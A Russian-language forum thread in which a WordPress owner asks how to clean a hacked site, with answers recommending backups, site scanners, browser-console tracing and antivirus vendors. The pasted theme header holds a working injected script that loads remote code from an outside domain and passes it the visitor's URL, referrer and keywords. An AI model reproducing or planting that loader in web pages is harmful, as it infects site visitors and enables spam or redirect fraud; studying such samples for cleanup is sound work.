Вирусы на WP, не могу найти как быть?

Доброго дня всем, была произведена крупная атака на сайт, и загружено большое кол-во ВПО. Вот один из примеров кода, сам найти не могу:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

	<title><?php bloginfo('name'); ?><?php wp_title(); ?></title>

	<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />	
	<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats please -->

	<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
	<link rel="stylesheet" href="<?php bloginfo('stylesheet_directory'); ?>/css/flexslider.css" type="text/css" />
	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
	<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
	<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
	
	<?php wp_enqueue_script('jquery'); ?>
	<?php wp_enqueue_script('jquery-ui-tabs'); ?>
	<?php //wp_enqueue_script('jcarousellite', get_template_directory_uri() . '/js/jcarousellite_1.0.1.min.js', array( 'jquery' ), '', true);?>
	<?php wp_enqueue_script('flexslider', get_template_directory_uri() . '/js/jquery.flexslider-min.js', array( 'jquery' ), '', true);?>
	<?php wp_get_archives('type=monthly&format=link'); ?>
	<?php //comments_popup_script(); // off by default ?>
	<?php wp_head(); ?>
	
	<!-- Yandex.Metrika counter -->
	<script type="text/javascript">
	(function (d, w, c) {
		(w[c] = w[c] || []).push(function() {
			try {
				w.yaCounter123 = new Ya.Metrika({id:123,
						clickmap:true,
						trackLinks:true,
						accurateTrackBounce:true});
			} catch(e) { }
		});

		var n = d.getElementsByTagName("script")[0],
			s = d.createElement("script"),
			f = function () { n.parentNode.insertBefore(s, n); };
		s.type = "text/javascript";
		s.async = true;
		s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

		if (w.opera == "[object Opera]") {
			d.addEventListener("DOMContentLoaded", f, false);
		} else { f(); }
	})(document, window, "yandex_metrika_callbacks");
	</script>
	<noscript><div><img src="//mc.yandex.ru/watch/123" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
	<!-- /Yandex.Metrika counter -->
	<script>
		jQuery(document).ready(function($) {
			$('.page-item-4620 a').attr("href", "http://site.ru/");
			$('.page-item-4620 a').attr("target", "_blank");
			$('.page-item-4624 a').attr("href", "http://site.ru/");
			$('.page-item-4624 a').attr("target", "_blank");
		})
	</script>
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://talentosdavidfischman.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body>
<div id="wrapper">
	<div id="header">
		<div id="branding">
			<div class="stitle" role="banner" onclick="location.href='/';" style="cursor: pointer;">
				123
			</div>
			<div class="enter"><a href="/wp-admin">Войти</a></div>
			<div class="social">
				<a class="twit" target="_about:blank" href="http://twitter.com" title = "Твиттер"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/twitter.gif" height="30" /> </a>
				<a class="vk" target="_about:blank" href="http://vk.com" title = "ВКонтакте"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/vk.gif" height="30" /> </a>
				<a class="fb" target="_about:blank" href="http://facebook.com" title = "Facebook"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/fb.gif" height="30" /> </a>
				<a class="jj" target="_about:blank" href="http://livejournal.com/" title = "ЖивойЖурнал"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/livejournal.gif" height="30" /> </a>
				<a class="rss" target="_about:blank" href="/feed" title = "Новостная лента"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/rss.gif" height="30" /> </a>
			</div>
			<div class="search">
				<?php get_search_form(); ?>
			</div>
		</div>
	</div> <!-- #header -->
	
	<div id="nav-menu">
				<?php wp_nav_menu( array( 'container_class' => 'menu-header', 'theme_location' => 'primary' ) ); ?> 
	</div>
		
	<div id="main">
  • Вопрос задан
  • 982 просмотра
Пригласить эксперта
Ответы на вопрос 4
webinar
@webinar Куратор тега Веб-разработка
Учим yii: https://youtu.be/-WRMlGHLgRg
Все очень просто, воспользуйтесь backup-ом предварительно в идеале закрыть дыры, через которые была атака.
Ответ написан
Антивирусы для компьютеров плохо работают на поимку такого типа заражений.

Попробуйте специальную утилиту для чистки сайтов - я с её помощью несколько вылечил, проблем не было:
Ссылка

Выводит список зараженных и подозрительных файлов - и места, где находится зловредный код
Ответ написан
Комментировать
bsf
@bsf
Из практики схема обычно такая, если копии тоже "больные".
Если ОС на компьютере Windows, то отключаем все антивирусы. Сливаем сайт на компьютер по фтп. Архивируем с паролем, чтоб антивирус не почистил все в архиве. Включаем антивирус и травим его на каталог. Смотрим на что ругается и начинаем ручками убирать все иньекции в коде.
Еще в чистке помогает консоль хрома. Если код вируса подгружается с левого сайта, то можно отследить через какой js файл.
Ответ написан
Комментировать
Ankhena
@Ankhena
Нежно люблю верстку
Как-то отправляла файлик в Доктор Веб, помогли.
Да и хостер тоже заинтересован в сайтах без вирусов, так что поддержка обычно помогает.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы